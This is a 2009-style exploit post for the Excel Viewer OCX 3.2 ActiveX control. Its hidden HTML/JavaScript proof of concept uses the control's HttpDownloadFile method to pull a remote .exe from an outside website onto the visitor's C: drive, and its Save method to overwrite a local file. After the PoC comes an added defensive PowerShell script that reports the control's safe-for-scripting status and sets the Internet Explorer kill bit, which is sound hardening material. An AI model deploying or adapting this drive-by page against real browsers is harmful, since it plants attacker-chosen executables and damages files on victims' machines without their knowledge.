
excelocx-insecure.txt

Posted on 13 January 2009

<html>
<body>
/* --=0-0-000000000--x==-xxxxxxxxx<br/>
- Excel Viewer OCX 3.2 <br/>
homepage: www.officeocx.com <br/>
download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>
- RegKey Safe for Script: True<br/>
- RegKey Safe for Init: True <br/>
- Implements IObjectSafety: True <br/>
- IDisp Safe: Safe for untrusted: caller,data <br/>
- IPersist Safe: Safe for untrusted: caller,data <br/>
- IPStorage Safe: Safe for untrusted: caller,data <br/>
- Tested on Avant Browser 11.7.21 ie 6 <br/>
Vuln: <br/>
1) Arbitrary File Download [HttpDownloadFile]<br/>
2) Arbitrary file overwrite [Save] <br/>
<br/>
--==0-0000000011011110=== <br/>
Probably it is the worst app I have ever seen <br/>
It is funny that it is meant as Safe for scripting <br/>
They want to sell it l0l <br/>
---000----------++++---------------000 <br/>
Alfons Luja <br/>
Greetings to my fans <br/>
9002 <br/>
:P <br/>
00 -0000000000000000===------------------x <br/>
*/<br/>
<div style="visibility:hidden;">
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
<script type="text/javascript">
/*
  I don't know why, but this code acts correctly only the first time;
  later it just crashes IE.
  In Avant Browser it is always OK, but it is necessary to wait a long time
  for loading to finish - strange :x
*/
try {
    var obj = document.getElementById('kupa');
    var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
    var loc = "C:evil.exe";
    // Vuln 2: Save() writes to a caller-supplied local path
    obj.Save("C:owerwrite.ini");
    // Vuln 1: HttpDownloadFile() fetches a remote URL to a caller-supplied local path
    obj.HttpDownloadFile(rem, loc);
} catch (err) {
    window.alert('Poc failed');
}
</script>
</div>
</body>
</html>
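
Defensive check for the control above, as an added example that is not part of the original advisory: the PowerShell below reports whether the CLSID from the PoC's object tag is registered and marked safe for scripting or initialization, and can set the Internet Explorer kill bit for it. The two CATIDs and the 0x400 `Compatibility Flags` kill bit are the standard Windows values; the function names are hypothetical, and writing under HKLM requires an elevated prompt.

```powershell
# Added example, not from the advisory. CLSID taken from the PoC's <object> tag.
$Clsid = '{18A295DA-088E-42D1-BE31-5028D7F9B965}'

# Component categories that tell IE a control may be driven by untrusted pages.
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C14A4}'
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C14A4}'
$KillBit          = 0x400   # Compatibility Flags bit that blocks instantiation in IE
# Native registry view plus the 32-bit view on 64-bit Windows.
$Roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node'

function Get-CompatFlags {
    param([string]$CompatKey)
    # Returns 0 when the key or value does not exist.
    $p = Get-ItemProperty -LiteralPath $CompatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($p) { [int]$p.'Compatibility Flags' } else { 0 }
}

function Get-ActiveXExposure {
    param([string]$Clsid)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $clsKey = "$root\Classes\CLSID\$Clsid"
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        [pscustomobject]@{
            View             = $root
            Registered       = Test-Path -LiteralPath $clsKey
            SafeForScripting = Test-Path -LiteralPath "$clsKey\Implemented Categories\$SafeForScripting"
            SafeForInit      = Test-Path -LiteralPath "$clsKey\Implemented Categories\$SafeForInit"
            KillBitSet       = [bool]((Get-CompatFlags $compat) -band $KillBit)
        }
    }
}

function Set-ActiveXKillBit {
    param([string]$Clsid)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        # Create the key only if missing; New-Item -Force on an existing key would clear it.
        if (-not (Test-Path -LiteralPath $compat)) { New-Item -Path $compat -Force | Out-Null }
        $flags = (Get-CompatFlags $compat) -bor $KillBit   # preserve any other flags
        New-ItemProperty -LiteralPath $compat -Name 'Compatibility Flags' `
            -PropertyType DWord -Value $flags -Force | Out-Null
    }
}

Get-ActiveXExposure $Clsid | Format-Table -AutoSize
# Set-ActiveXKillBit $Clsid   # uncomment to block the control, then re-run the report
```

A control can also assert safety at run time through IObjectSafety without the category keys, as the advisory's header shows for this one, so `SafeForScripting = False` in the report does not by itself mean the control is unreachable from script; the kill bit covers both cases.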

 
